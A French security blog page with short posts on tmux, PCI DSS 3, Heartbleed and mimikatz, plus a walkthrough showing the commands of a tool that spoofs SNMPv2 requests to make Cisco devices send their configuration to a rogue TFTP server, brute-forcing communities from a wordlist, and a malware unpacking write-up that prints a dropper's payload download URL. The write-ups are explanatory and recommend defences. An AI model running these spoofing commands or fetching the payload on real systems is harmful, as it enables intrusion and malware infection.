Scroller dans TMUX sur mon Mac

Cela à été pénible à trouver, alors je le partage.

J’ai un macbook, et je suis un fervent utilisateur de Tmux (Ce mac ne sert que de client SSH oui je sais c’est d’une tristesse.) Bref, sous tmux pour scroller “UP” c’est par défaut CTRL b + ]  et ensuite c’est page up/ page down.  Autre petite joyeuseté je suis bépoiste. (Voir ici pour changer votre vie). Donc pour moi bépoiste qui a un clavier de macbook, on sombre, c’est CTRL b + ALT 4 et je scrolle avec Fn+Shift flèche… et bien sur, Q pour quitter ce mode … Usant donc…

Grace à ces deux lignes dans le .tmux.conf il suffit désormais de faire Fn flèche up ou flèche down.

set-window-option -g alternate-screen on
set -g terminal-overrides 'xterm*:smcup@:rmcup@'

 

Posted in BlaBla, Linux | Tagged | Leave a comment

How my God !

A faire avec la voix de Janice dans friends…

Neither the NT hash nor the LM hash is salted. Salting is a process that combines the password with a random numeric value (the salt) before computing the one-way function. Windows has never stored hashes in human-readable form, so there has never been a need to salt them.

Non mais qu’est-ce qui faut pas lire comme justification je vous jure.

Source : http://technet.microsoft.com/en-us/library/hh994558(v=ws.10).aspx

Posted in BlaBla | Tagged , | Leave a comment

Hackers & Malwares #Fear.. PCI DSS3 est là :)

Je vient de découvrir que la norme de sécu des petits gars des cartes de crédit a subit un petit ravalement de facade. A priori c’est pour juin 2015 la mise en pratique. A part des petits trucs qui font toujours ricaner du style “L’antivirus doit être actif.”. Rien de bien exceptionnellement nouveau. Le chapitre pentesting guideline à été splité en deux, un pour dehors un pour dedans. Bonne nouvelle pour les professionnels $$, C’est un test externe et interne minimum par an et en prime, un test interne a chaque changement d’infrastructure (du style Os upgrade et ajout de ranges) .

https://www.pcisecuritystandards.org/documents/PCI_DSS_v3_Summary_of_Changes.pdf

https://www.pcisecuritystandards.org/documents/PCI_DSS_v3.pdf

 

Posted in BlaBla | Tagged , | Leave a comment

SNMPv2 + ACL, là Berthier on est bien.

Dans certains cas, une ACL c’est un peu Useless, c’est typiquement le cas en SNMP v2. Dans ce que l’on va voir, rien de 9 depuis 10 ans, mais ça marche toujours. Voici un petit poc qui permet de récupérer la configuration d’un device cisco en passant outre l’ACL configurée sur le service.

https://github.com/Th4nat0s/Chall_Tools/blob/master/spoof_tftp_bckp.py

Pour  m’occuper (oui je suis au calme ces temps-ci) j’ai fait un petit script pour valider ce POC. Je suis d’ailleurs étonné que personne n’en ai fait depuis tout ce temps. Mettons que vous pentestiez et que vous soyez coincé devant un routeur ou un switch de type catalyst 6k qui refuse de vous laisser lui titiller en SNMP car évidemment l’administrateur a bien fait son travail et a mis en place une ACL sur le service.

Du genre

snmp-server community topsecret rw 60
access-list 60 permit 10.1.1.1
access-list 60 permit 10.2.2.2

Là Berthier, il pense être safe, franchement que risque t’il.  La communauté est pas “PRIVATE” il y a une ACL.

Le hic c’est la conjonction de deux petites faiblesses. SNMPv2 c’est UDP et l’UDP ca se spoof. Du coup, dans un réseau, cette ACL ne sert strictement à rien. Cela s’attaque presque comme si il n’y en avait pas. Ensuite le truc qui aide bien c’est qu’en SNMP on peut demander au Cisco de backuper en TFTP sur une 3eme IP de notre choix qui n’est pas celle qui donne l’ordre.

Au final, dans un réseau interne, cela marche bien. Dans l’absolu, si quelqu’un spoofe depuis internet ca marche aussi. On comprend mieux l’intérêt des ACL anti spoofing qu’il faut obligatoirement mettre directement sur l’interface externe du routeur.

C’est pas Win Win mais pour trouver les IP qui on probablement le droit de backuper;  Petites idées;

  • IP qui dispose d’un serveur TFTP qui tourne  (Port 69 bien sur).
  • IP qui répondent dans le DNS au doux nom de “CCP, LMS, Cacti,  Smarts, MOM, RRD, Nagios, Nabbix …”
  • Une page de test du photocopieur (filera aussi probablement la communautés avec un peu de chance).
  • Infos Glanées autre part dans votre pentest.
  • Etc..

Allons y, on demande de backuper… ici le routeur est en 192.168.1.2 et votre rogue serveur tftp en .3. Deux possibilitées

A) Chanceux vous disposez de la communauté RW

$ ./spoof_tftp_bckp.py
Fun tool to bypass ACL, Trigger a backup of a cisco from a spoofed ip
ACL in SNMP v2 protect nothing
To Use: ./spoof_tftp_bckp.py src_ip csco_ip tftp_ip [rwcommunity or filename]

$ sudo ./spoof_tftp_bckp.py 10.1.1.1 192.168.1.2 192.168.1.3 PRIVATE
Payload send from 10.1.1.1 to 192.168.1.2 with Community PRIVATE backup to 192.168.1.3

B) Pas de communauté, on bruteforce comme un Âne avec une password list.

$ sudo ./spoof_tftp_bckp.py 10.1.1.1 192.168.1.2 192.168.1.3 /opt/metasploit/apps/pro/data/wordlists/snmp_default_pass.txt
. . . . . . . . . . . . . . . . . . . .
Finished list

Dans les deux cas, si tout se passe bien, un fichier devrait arriver dans votre tftp d’ici quelques secondes.

En conclusion, attention, en UDP une ACL n’apporte pas grand choses si elle n’est pas en place sur une interface pour faire de l’anti-spoofing. Rien de tous cela n’est nouveau. Je sais que c’est pénible, mais SNMPv3 est la solution, il a 10 ans désormais.

Posted in Hacking, Network | Tagged , , | 2 Comments

CVE-2014-0160, Probablement le poney award de l’année.

Ce n’est pas une énième attaque SSL qui ne sortira pas d’un labo, mais bel et bien un beau bug ma fois. Avec moultes exploits qui fleurissent depuis hier.

En clair, on peut dumper 64ko de mémoire du serveur à distance permettant ainsi de récupérer au petit bonheur la chance des Sessions ID et des crédentials et des clefs ssl. Cela impacte les versions 1.0.1 à 1.0.1f et 1.0.2 beta.

Ca crains :) de Apache, Beeware en passant par Juniper, sur du https, Imaps… tout le monde y a droit.

Patchez les enfants, Patchez… et dans le doute, changez de certs

Posted in Crypto, WebSecurity | Tagged , , | Leave a comment

UTF8 Power

Même dans les automates de parking, il semble sévir !

Screen Shot 2014-03-22 at 15.34.44

Posted in BlaBla | Leave a comment

A bin si le code source se balade…

Faut pas que MT. Gox s’étonne d’avoir perdu 750000 Bitcoins..

http://pastebin.com/W8B3CGiN

Posted in BlaBla | Tagged | 1 Comment

Dépacking sans IDA :) vive les strings

Un collègue m’a fournit un petit EXE. Voici une petite histoire fort rigolote. Comme quoi la qualité des droppeurs est bien inégale.  À première vue, pfff tendu.. un EXE .NET

$ file stage1.exe 
stage1.exe: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows

Et bien non, on ne reverse pas. En stringuant les strings unicodes (quoi cela ne se dit pas ? ), on a directement l’emplacement du stage 2.

$ strings -el stage1.exe 
http://ledetour.fr/images/bs.exe
/dwm.exe
___ICO

On downloade le stage 2.. et là , rebelotte, le stress. Encore un .Net

$ file bs.exe 
bs.exe: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows

Là en stringuant l’ascii on tombe sur un ENORME champ intriguant :

Screen Shot 2014-02-06 at 23.17.39

Très intriguant n’est-ce pas, ca sens le base64 mais c’est pas du base 64, mais ca sens le PE encodé en base 64, Un peu d’header, et beaucoup de “0”. un vrai base 64 de PE ca ressemble à ca..

Screen Shot 2014-02-06 at 23.23.36

En réfléchissant un peu de A à C, ca change de 2. C’est trop beau pour être vrai … Essayons. On découpe cette string magique..

$ grep -boa VXsSCCOCC bs.exe 
15584:VXsSCCOCC
$  tail -c+15585 bs.exe > stage3.exe

Ensuite on shifte de -2 char…  et oui c’est bien ca, on base64 décode…

$shiftprint.py stage3.exe 64 | head
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAuAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5v
dCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAAC3Egfb83NpiPNzaYjzc2mI
GmxkiPJzaYhSaWNo83NpiAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFBFAABMAQMA
vIh9UAAAAAAAAAAA4AAPAQsBBgAAwAIAABAAAADwBABwuQcAAAAFAADABwAAAEAA
ABAAAAACAAAEAAAAAQAAAAQAAAAAAAAAANAHAAAQAAAAAAAAAgAAAAAAEAAAEAAA
AAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAoMQHANQAAAAAwAcAoAQAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

$shiftprint.py stage3.exe 64 | base64 -d > stage3bis.exe

hooo c’est magique.. et on remet ca dans un vrai exe…on tombe sur un UPX.

$ file stage3bis.exe 
stage3bis.exe: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
$ upx -d stage3bis.exe 
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2013
UPX 3.09        Markus Oberhumer, Laszlo Molnar & John Reiser   Feb 18th 2013

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
    466944 <-    181760   38.93%    win32/pe     stage3bis.exe

Unpacked 1 file.

Et c’est bingo… c’est plus packé

$ strings stage3bis.exe  -el | grep http
http://www.facebook.com/?ref=home
http://www.facebook.com
http://
http\shell\open\command
SOFTWARE\Classes\http\shell\open\command
Software\Classes\http\shell\open\command
https://onlineeast#.bankofamerica.com

On a rarement autant de moule :) Sérieux les gars, utilisez RC4 au moins, c’est pas plus dur à utiliser, mais ca force à ouvrir l’exe pour dépacker.

Spéciale dédicace à Tecamac, grand fan des crypto à deux balles :)

3421020f6cfff96201a15d24976e862a  stage1.exe
135c2d12bfa205b6cba13a29329c2f77  stage2.exe
12440f3e323638ba30e78c00b26d4734  stage3.exe

Posted in Malware, Reverse | Tagged , | Leave a comment

NTLM & Kerberos bidouilleries

Je suis tombé sur un très bon blog de M. Gentil Kiwi qui reprend et explique les principes de ce qu’on peut faire avec un ticket kerberos ou un hash ntlm. Ce site fait la promo de mimikatz. Un tools pas piqué de hannetons créé par le même monsieur qui scrute la mémoire à chaud. Cela permet initialement de récupérer des crédentials et des tickets de sécu mais pas que :) Encore une bonne raison de considerez un VIP comme un user Lambda.. (Oui ok, on le fera pas)

Je vous le conseille :

http://blog.gentilkiwi.com/securite/mimikatz/golden-ticket-kerberos ou comment générer un ticket kerberos valide une petite dizaine d’année.

http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos ou comment passer un hash ticket.

Et j’ai un petit faible pour celui là

http://blog.gentilkiwi.com/securite/mimikatz/demineurs

Posted in Hacking, Windows | Tagged , , | 2 Comments

Hé bin on se lache ! L’injecteur social.

Il n’y a pas de doutes, on a franchis un cap, voila que les teams indonésiennes spécialisées dans le ponçage d’applications web mettent directement leur liens facebook et twitter dans les injecteurs.

Grosse Grosse classe !

https://www.facebook.com/Newbie.Yang.Hilang.TeaM
https://twitter.com/NyhTeaM

Screen Shot 2014-01-29 at 20.20.11

 

Posted in Hacking, WebSecurity | Tagged , , , | Leave a comment